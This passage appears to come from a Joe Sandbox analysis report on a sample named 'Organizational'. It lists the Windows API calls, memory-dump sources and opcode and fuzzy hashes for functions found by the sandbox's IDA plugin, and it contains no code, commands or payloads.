                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 0ffbaf2f3393435aea4cdd8a2c88fdf49dab1942e999ec6c0172882b350a0600
                                                          • Instruction ID: daac73c91973362437a0c556c3828b24326c57b773eae76f07a08345b2a61f63
                                                          • Opcode Fuzzy Hash: 0ffbaf2f3393435aea4cdd8a2c88fdf49dab1942e999ec6c0172882b350a0600
                                                          • Instruction Fuzzy Hash: 1B211374528352DFDB14DF14C458B1ABBE0BF84305F058968F88A9B362C731E869CFA6
                                                          APIs
                                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00263CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00264276
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 622e724be2afc291ad4ede8e354d8a534a9b99cf84a64062ed250152ef6a9d56
                                                          • Instruction ID: 6ed66b78c70b8fb77779c8b9063418181db534b9582df539d0cef232c5ca2d3b
                                                          • Opcode Fuzzy Hash: 622e724be2afc291ad4ede8e354d8a534a9b99cf84a64062ed250152ef6a9d56
                                                          • Instruction Fuzzy Hash: 6D113A312107019FD320DF55D490B62B7F9EF88710F20C92EE8EA8AA50D7B0E895CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                          • Instruction ID: 529fc58b139620b62d4ae247c413fc868d54b6539c33af2fc8818a6b0178e917
                                                          • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                          • Instruction Fuzzy Hash: B801A772221701AED7245F78D802A67B7949B44790F14C529F51ECA1D1DA71F8A08A50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                          • Instruction ID: 084cf48d363d19bd11c08856b9aac526566eab28b8d69b9a6a2c3acfd1b1f9bd
                                                          • Opcode Fuzzy Hash: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
                                                          • Instruction Fuzzy Hash: E601D632210215ABCB24DF2DC89196BB7A9EF86354714842EF80ECB245EA31E811CB90
                                                          APIs
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                          • _memset.LIBCMT ref: 002B7CB4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 525207782-0
                                                          • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                          • Instruction ID: 1ebe9363a64609b0786397ee722c61a39cdbf30aa537e5f24af3c89227319abd
                                                          • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                          • Instruction Fuzzy Hash: 4E01E474214204DFD321EF5CD541F49BBE1AF59310F24C49AF5888B392DB72A8608F91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _fseek
                                                          • String ID:
                                                          • API String ID: 2937370855-0
                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                          • Instruction ID: 9adff4372c00108fa960ff62da0a494299cd614de8699aab7977817ac9bd991e
                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                          • Instruction Fuzzy Hash: 8EF085B6410208BFDF109F84DC00CEBBBBDEB89720F008198F9045A210D272EA618BA0
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,?,002627AF,?,00000001), ref: 00264A63
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: f44608948c98dfb19b4e21cfb7053e1e173c8f4d6e15fde65f46cbaa3996b2c4
                                                          • Instruction ID: cb3f5c8b8246955f4d12beb116c1236495c6ce3cdddf008a581cb8bfe8894a23
                                                          • Opcode Fuzzy Hash: f44608948c98dfb19b4e21cfb7053e1e173c8f4d6e15fde65f46cbaa3996b2c4
                                                          • Instruction Fuzzy Hash: F3F08571161702EFCB34AFA4E4A0816BBF1AF043253208A3EE5DA87610C3719DA0CF04
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock
                                                          • String ID:
                                                          • API String ID: 2638373210-0
                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                          • Instruction ID: 452bf2676476387e11d185af8e9d2cdf0799ba31bf30c454473b3b89daaab623
                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                          • Instruction Fuzzy Hash: 7AF0587241020DFFDF04CF80C941EAABB79FF04314F208189F8188A212D772DA61AB91
                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002709E4
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: 2f8f9866f722dbf7fd75b46175b91f7f51fe9f6621e1d936819b387f0bf14f67
                                                          • Instruction ID: 22e599ebb178a39835f910d9f6703f1427692419764cc41d99d991fb58b90761
                                                          • Opcode Fuzzy Hash: 2f8f9866f722dbf7fd75b46175b91f7f51fe9f6621e1d936819b387f0bf14f67
                                                          • Instruction Fuzzy Hash: F5E0863691022857C721A6989C45FEA77EDDF89690F0401B6FC08D7244D961ACE28AD1
                                                          APIs
                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002B4D31
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FolderPath_memmove
                                                          • String ID:
                                                          • API String ID: 3334745507-0
                                                          • Opcode ID: f6723728b4d62993bcb7b81be925313ec0e0f42c2fe5946cc1f68b1139022afb
                                                          • Instruction ID: 23fb08db996e4552f5a9572042c5d696b1bff19a586afba5212a9c961ad9efa5
                                                          • Opcode Fuzzy Hash: f6723728b4d62993bcb7b81be925313ec0e0f42c2fe5946cc1f68b1139022afb
                                                          • Instruction Fuzzy Hash: 64D05EA591032C2BEB64E6A4AC8DDB77BACD744220F0006A17C5CC3141E964AD958AE0
                                                          APIs
                                                            • Part of subcall function 002B384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,002B3959,00000000,00000000,?,002A05DB,00308070,00000002,?,?), ref: 002B38CA
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,002A05DB,00308070,00000002,?,?,?,00000000), ref: 002B3967
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: fd414f500cb4afd4cdc84467e7cc0726f2d24f0d77edadd5fa605b5c37bf8c98
                                                          • Instruction ID: 30442a000e5f9b14d993a5f2dd6eb658d625b6b2f2a2cd58488186fa8f4767a9
                                                          • Opcode Fuzzy Hash: fd414f500cb4afd4cdc84467e7cc0726f2d24f0d77edadd5fa605b5c37bf8c98
                                                          • Instruction Fuzzy Hash: AEE04F35410208BBD720EF94D805ADAB7BCEF05320F00455AFD4095111D7B29E249B91
                                                          APIs
                                                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002B3E7D,?,?,?), ref: 002B3F0D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: f0ca5270415a765de9f4ad533311c6a491d4f07d52ab3d459bd577e640ff82fc
                                                          • Instruction ID: 2818f895a226997d70298cc7a1ff14175f47ee2105124537642f5dca1a8e46de
                                                          • Opcode Fuzzy Hash: f0ca5270415a765de9f4ad533311c6a491d4f07d52ab3d459bd577e640ff82fc
                                                          • Instruction Fuzzy Hash: 46D0A7315E020CBBEF50DFA0DC46F68B7ACE701706F1002E4BA04D90E0DAB2691497A5
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,002A06E6,00000000,00000000,00000000), ref: 002642BF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 61262e3e784d21ccdeb3450dc0e545b780a569c69e3dff44a9061cfc30b26464
                                                          • Instruction ID: 5fc8c88298fb48f25a7aa43f3318dcb88bd67a204654c3c2369a7f26e337afb6
                                                          • Opcode Fuzzy Hash: 61262e3e784d21ccdeb3450dc0e545b780a569c69e3dff44a9061cfc30b26464
                                                          • Instruction Fuzzy Hash: 7CD0C77464020CBFE710CB80DC46FA9777CE705711F100194FD046A290D6F27D508795
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: c9d9a2ae173fbff7e7b22d161cb3dc37a222c4c5c9120ed3b0e4a90f7887f018
                                                          • Instruction ID: a1dec809a5d054092b1a07d14b57884a043199bcb19edf2e1c1b851476a0e5d2
                                                          • Opcode Fuzzy Hash: c9d9a2ae173fbff7e7b22d161cb3dc37a222c4c5c9120ed3b0e4a90f7887f018
                                                          • Instruction Fuzzy Hash: 0BB09234062642569D282E3C29CC0E9330158423E97D81B81E4788E8E2923988ABA520
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: 86e36adafb0fcbae76d3e012b17cf6c9e4adb6cae52154e5a9ee946503c5abeb
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: 39B0927644020C77CE012E82EC03A597B29AB40668F408020FB0C1C162A6B3A6B09A89
                                                          APIs
                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 002BD842
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          • Opcode ID: 4e8a6294f4d0bb7ed5a46b17ea8b8f93158faf9b1d61bcc564b52bb847298e91
                                                          • Instruction ID: 5edaffe03e0b6468cfb8604c2082926b8eda48df8092b080337bdcc7c501fb9a
                                                          • Opcode Fuzzy Hash: 4e8a6294f4d0bb7ed5a46b17ea8b8f93158faf9b1d61bcc564b52bb847298e91
                                                          • Instruction Fuzzy Hash: 907165302247428FC714EF64D491AEEB7E1AF88355F04462DF896972A2DB30ED69CF52
                                                          APIs
                                                            • Part of subcall function 002B4005: FindFirstFileW.KERNEL32(?,?), ref: 002B407C
                                                            • Part of subcall function 002B4005: DeleteFileW.KERNEL32(?,?,?,?), ref: 002B40CC
                                                            • Part of subcall function 002B4005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 002B40DD
                                                            • Part of subcall function 002B4005: FindClose.KERNEL32(00000000), ref: 002B40F4
                                                          • GetLastError.KERNEL32 ref: 002BC292
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2191629493-0
                                                          • Opcode ID: 8ff69ce59e03087d3685231b2af83ff5ed559a60eb7f469acdf695b101002111
                                                          • Instruction ID: 05dda92454dc413338073de22f69bdc9d4c98b5fdf40f0e435ae1de734d7a90b
                                                          • Opcode Fuzzy Hash: 8ff69ce59e03087d3685231b2af83ff5ed559a60eb7f469acdf695b101002111
                                                          • Instruction Fuzzy Hash: 5BF0A7312202104FCB14FF59D884F59B7E5AF84364F058459F9058B352CB74BC51CF94
                                                          APIs
                                                          • CloseHandle.KERNEL32(?,?,00000000,00292F8B), ref: 002642EF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 9648ba7eda4399f9b5b43c1c6c0c90c2ed20c22b5265c9d46dae97c2613271f0
                                                          • Instruction ID: 1957b0a9c824f9e92673e3bac8207054224ba5117364601cc89b2f7471267502
                                                          • Opcode Fuzzy Hash: 9648ba7eda4399f9b5b43c1c6c0c90c2ed20c22b5265c9d46dae97c2613271f0
                                                          • Instruction Fuzzy Hash: 06E09275410B02CFC3315F1AE814416FBE4FFE13613214A2FE4E6926A0D3B058AA8B90
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 002DD208
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DD249
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002DD28E
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DD2B8
                                                          • SendMessageW.USER32 ref: 002DD2E1
                                                          • _wcsncpy.LIBCMT ref: 002DD359
                                                          • GetKeyState.USER32(00000011), ref: 002DD37A
                                                          • GetKeyState.USER32(00000009), ref: 002DD387
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002DD39D
                                                          • GetKeyState.USER32(00000010), ref: 002DD3A7
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002DD3D0
                                                          • SendMessageW.USER32 ref: 002DD3F7
                                                          • SendMessageW.USER32(?,00001030,?,002DB9BA), ref: 002DD4FD
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 002DD513
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 002DD526
                                                          • SetCapture.USER32(?), ref: 002DD52F
                                                          • ClientToScreen.USER32(?,?), ref: 002DD594
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002DD5A1
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002DD5BB
                                                          • ReleaseCapture.USER32 ref: 002DD5C6
                                                          • GetCursorPos.USER32(?), ref: 002DD600
                                                          • ScreenToClient.USER32(?,?), ref: 002DD60D
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD669
                                                          • SendMessageW.USER32 ref: 002DD697
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD6D4
                                                          • SendMessageW.USER32 ref: 002DD703
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002DD724
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002DD733
                                                          • GetCursorPos.USER32(?), ref: 002DD753
                                                          • ScreenToClient.USER32(?,?), ref: 002DD760
                                                          • GetParent.USER32(?), ref: 002DD780
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 002DD7E9
                                                          • SendMessageW.USER32 ref: 002DD81A
